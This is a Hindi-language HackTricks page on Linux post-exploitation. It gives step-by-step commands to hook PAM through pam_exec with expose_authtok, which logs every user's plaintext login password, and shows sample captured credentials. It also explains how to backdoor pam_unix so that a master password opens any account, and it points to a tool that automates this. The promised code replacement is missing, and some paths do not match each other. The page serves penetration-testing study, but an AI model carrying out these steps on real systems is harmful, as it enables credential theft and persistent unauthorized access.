hacktricks/linux-hardening/linux-post-exploitation
Translator workflow 75e8745ba3 Translated to Hindi
2023-11-06 08:38:02 +00:00
..
pam-pluggable-authentication-modules.md Translated to Hindi 2023-11-06 08:38:02 +00:00
README.md Translated to Hindi 2023-11-06 08:38:02 +00:00

लिनक्स पोस्ट-एक्सप्लोइटेशन

☁️ हैकट्रिक्स क्लाउड ☁️ -🐦 ट्विटर 🐦 - 🎙️ ट्विच 🎙️ - 🎥 यूट्यूब 🎥

PAM के साथ लॉगऑन पासवर्ड को स्निफ करें

चलो PAM मॉड्यूल को कॉन्फ़िगर करें ताकि हर उपयोगकर्ता द्वारा उपयोग किए जाने वाले पासवर्ड को लॉग करें। यदि आपको पता नहीं है कि PAM क्या है, तो देखें:

{% content-ref url="pam-pluggable-authentication-modules.md" %} pam-pluggable-authentication-modules.md {% endcontent-ref %}

सबसे पहले, हम एक बैश स्क्रिप्ट बनाते हैं जो हर नई प्रमाणीकरण होने पर आवंटित किया जाएगा।

#!/bin/sh
echo " $(date) $PAM_USER, $(cat -), From: $PAM_RHOST" >> /var/log/toomanysecrets.log

परिवर्तनशीलता चरों केवल PAM विशिष्ट होंगे और pam_exec.so मॉड्यूल के माध्यम से उपलब्ध होंगे।

यहां चरों का अर्थ है:

  • $PAM_USER: उस उपयोगकर्ता का नाम जो दर्ज किया गया था।
  • $PAM_RHOST: रिमोट होस्ट (सामान्यतः IP पता)
  • $(cat -): यह stdin को पढ़ता है, और इसमें स्क्रिप्ट द्वारा पकड़ा गया पासवर्ड होगा
  • परिणामों को /var/log/toomanysecrets.log पर एक लॉग फ़ाइल में पाइप किया जाता है

फ़ाइल को सभी उपयोगकर्ताओं को पढ़ने से रोकने के लिए, इसे पहले से बना लें और chmod चलाएं, उदा।:

sudo touch /var/log/toomanysecrets.sh
sudo chmod 770 /var/log/toomanysecrets.sh

अगले, PAM कॉन्फ़िगरेशन फ़ाइल को अपडेट किया जाना चाहिए, pam_exec मॉड्यूल का उपयोग स्क्रिप्ट को आह्वानित करने के लिए किया जाएगा।

/etc/pam.d/ में कई कॉन्फ़िग फ़ाइलें होती हैं, और हम common-auth को चुनते हैं।

sudo nano /etc/pam.d/common-auth

फ़ाइल के नीचे, निम्नलिखित प्रमाणीकरण मॉड्यूल जोड़ें:

auth optional pam_exec.so quiet expose_authtok /usr/local/bin/toomanysecrets.sh

विकल्पों का निम्नलिखित अर्थ है:

  • optional: यदि कोई त्रुटि हो तो प्रमाणीकरण विफल नहीं होना चाहिए (यह एक आवश्यक चरण नहीं है)
  • pam_exec.so: यह लिविंग ऑफ द लैंड पैम मॉड्यूल है जो विभिन्न स्क्रिप्ट को आमंत्रित कर सकता है
  • expose_authtok: यह ट्रिक है जो stdin के माध्यम से पासवर्ड पढ़ने की अनुमति देता है
  • quiet: उपयोगकर्ता को कोई त्रुटि नहीं दिखाएं (यदि कुछ काम नहीं करता है तो)
  • अंतिम तर्क पिछले बनाए गए शैल स्क्रिप्ट है

अंत में, फ़ाइल को क्रियाशील बनाएं:

sudo chmod 700 /usr/local/bin/toomanysecrets.sh

अब, इसे एक दूसरे मशीन से ssh करके या स्थानीय रूप से लॉगिन करके इसे आज़माएं।

और फिर लॉग फ़ाइल पर नज़र डालें:

$ sudo cat /var/log/toomanysecrets.log
Sun Jun 26 23:36:37 PDT 2022 tom, Trustno1!, From: 192.168.1.149
Sun Jun 26 23:37:53 PDT 2022 tom, Trustno1!, From:
Sun Jun 26 23:39:12 PDT 2022 tom, Trustno1!, From: 192.168.1.149

PAM को Backdoor करना

चलो PAM के स्रोत में जाएँ (आपके डिस्ट्रो पर निर्भर करेगा, अपने वर्जन नंबर को लें...) और pam_unix_auth.c फ़ाइल में लाइन नंबर 170/180 के आसपास देखें:

vi modules/pam_unix/pam_unix_auth.c

इसे निम्नलिखित से बदलें:

इससे किसी भी उपयोगकर्ता को "0xMitsurugi" पासवर्ड का उपयोग करके लॉग इन करने की अनुमति होगी।

pam_unix_auth.c को पुनः कंपाइल करें और pam_unix.so फ़ाइल को बदलें:

make
sudo cp \
/home/mitsurugi/PAM/pam_deb/pam-1.1.8/modules/pam_unix/.libs/pam_unix.so \
/lib/x86_64-linux-gnu/security/

{% hint style="info" %} आप इस प्रक्रिया को https://github.com/zephrax/linux-pam-backdoor के साथ स्वचालित कर सकते हैं। {% endhint %}

संदर्भ

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥